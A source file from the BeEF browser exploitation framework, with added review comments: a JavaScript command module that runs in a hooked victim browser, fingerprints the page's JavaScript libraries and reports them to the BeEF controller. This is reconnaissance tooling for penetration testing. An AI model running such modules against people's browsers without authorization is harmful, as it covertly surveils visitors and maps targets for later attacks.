Path: blob/master/modules/browser/hooked_origin/ajax_fingerprint/command.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

// Command module body: inside the callback handed to beef.execute it walks
// document.scripts, reduces each script's src to a bare file name, compares
// that name with a table of well-known JavaScript/AJAX library file names,
// and reports every hit through beef.net.send in a "script_urls=" field.
// The <%= ... %> tokens are ERB-style placeholders, so this text is not valid
// JavaScript as written - presumably they are substituted before delivery.
beef.execute(function() {

  // Pattern used to pull the script file name out of a src URL.
  // NOTE(review): the pattern is built from a string literal, so '\.' reaches
  // RegExp as a plain '.', which matches any character rather than a literal dot.
  var regex = new RegExp('/\\w*\.(min\.)?js');
  // Accumulates "Lib:<label> src:<url>" strings; the catch block in fp()
  // replaces it with an error string.
  var results = [];
  // Shadowed by the local `urls` declared inside fp(); not read in the visible code.
  var urls = "";

  // Returns the elements of `array` with duplicates dropped, keeping the first
  // occurrence of each value. Uses $.grep and $.inArray, so a jQuery-style `$`
  // must be in scope.
  function unique(array) {
    return $.grep(array, function(el, index) {
      return index === $.inArray(el, array);
    });
  }

  // Fingerprint table: report label -> array of script base names (no path,
  // no ".js" suffix) that are treated as evidence of that library.
  // NOTE(review): some entries look like typos or leftovers ("enevet",
  // the "xjax" label for xajax files, the duplicated "jquery-latest", and
  // "gb_scripts.js", which keeps a suffix the other names omit) - confirm.

  var fingerprints = {
    "Prototype":new Array("prototype"),
    "script.aculous":new Array("builder","controls","dragdrop","effects","scriptaculous","slider","unittest"),
    "Dojo":new Array("dojo.uncompressed","uncompressed","dojo"),
    "DWR":new Array("auth","engine","util"),
    "Moo.fx/":new Array("Moo","Function","Array","String","Element","Fx","Dom","Ajax","Drag","Windows","Cookie","Json","Sortable","Fxpack","Fxutils","Fxtransition","Tips","Accordion"),
    "Rico": new Array("rico","ricoAjax","ricoCommon","ricoEffects","ricoBehaviours","ricoDragDrop","ricoComponents"),
    "Mootools":new Array("mootools","mootools-core-1.4-full","mootools-more-1.4-full"),
    "Mochikit":new Array("Mochikit"),
    "Yahoo UI!": new Array("animation","autocomplete","calendar","connection","container","dom","enevet","logger","menu","slider","tabview","treeview","utilities","yahoo","yahoo-dom-event"),
    "xjax":new Array("xajax","xajax_uncompressed"),
    "GWT": new Array("gwt","search-results"),
    "Atlas": new Array("AtlasRuntime","AtlasBindings","AtlasCompat","AtlasCompat2"),
    "jquery":new Array("jquery","jquery-latest","jquery-latest","jquery-1.5"),
    "ExtJS":new Array("ext-all"),
    "Prettify":new Array("prettify"),
    "Spry": new Array("SpryTabbedPanels","SpryDOMUtils","SpryData","SpryXML","SpryUtils","SpryURLUtils","SpryDataExtensions","SpryDataShell","SpryEffects","SpryPagedView","SpryXML"),
    "Google JS Libs":new Array("xpath","urchin","ga"),
    "Libxmlrequest":new Array("libxmlrequest"),
    "jx":new Array ("jx","jxs"),
    "bajax":new Array("bajax"),
    "AJS": new Array ("AJS","AJS_fx"),
    "Greybox":new Array("gb_scripts.js"),
    "Qooxdoo":new Array("qx.website-devel","qooxdoo-1.6","qooxdoo-1.5.1","qxserver","q","q.domain","q.sticky","q.placeholder","shCore","shBrushScript"),

  };

  // Performs the fingerprint pass and sends exactly one report: the matches
  // joined with '||', an empty value when nothing matched, or
  // "Fingerprint failed: <message>" when anything in the try block throws.
  function fp() {
    try{
      var sc = document.scripts;
      var urls ="";
      var source = ""
      if (sc != null){
        // `sc` is reused as the loop key. for...in yields property names, so
        // keys that are not script elements can be visited as well; anything
        // without a truthy src is skipped by the empty-string check below.
        for (sc in document.scripts){
          source =document.scripts[sc]['src'] || "";
          if(source !=""){
            //get the script file name and remove unnecessary endings and such
            // match() returns null when the src does not fit `regex`; the
            // resulting TypeError is caught below and the whole run is reported
            // as failed, not just this one script.
            // The match array is stringified with toString(), which joins the
            // full match and the capture group with a comma. The trailing
            // ".js\W" alternative relies on that comma, and a captured "min."
            // group is left in the result. NOTE(review): the dots in this
            // second pattern are also unescaped wildcards.
            var comp = source.match(regex).toString().replace(new RegExp("/|.min|.pack|.uncompressed|.js\\W","g"),"");
            // `key` and `name` are never declared, so outside strict mode they
            // are created as globals. In a browser the global `name` is
            // window.name, so the page's window.name is overwritten as a side
            // effect of this loop.
            for (key in fingerprints){
              for (name in fingerprints[key]){
                // match name in the fingerprint object
                // Loose equality between the reduced file name and a table entry.
                if(comp==fingerprints[key][name]){
                  results.push("Lib:"+key+" src:"+source);
                }
              }
            }
          }
        }
      }
      // Both branches issue the same call; they differ only in that `urls`
      // is still the empty string when there were no matches.
      // The value is concatenated without URL-encoding.
      if(results.length >0){
        urls=unique(results).join('||');
        beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+urls);
      }
      else{
        beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+urls);
      }
    }
    catch(e){
      // Replaces the results array with an error string and reports that
      // instead; matches collected before the exception are discarded.
      results = "Fingerprint failed: "+e.message;
      beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+results.toString());
    }
  }

  // Run once, as soon as the callback executes.
  fp();

});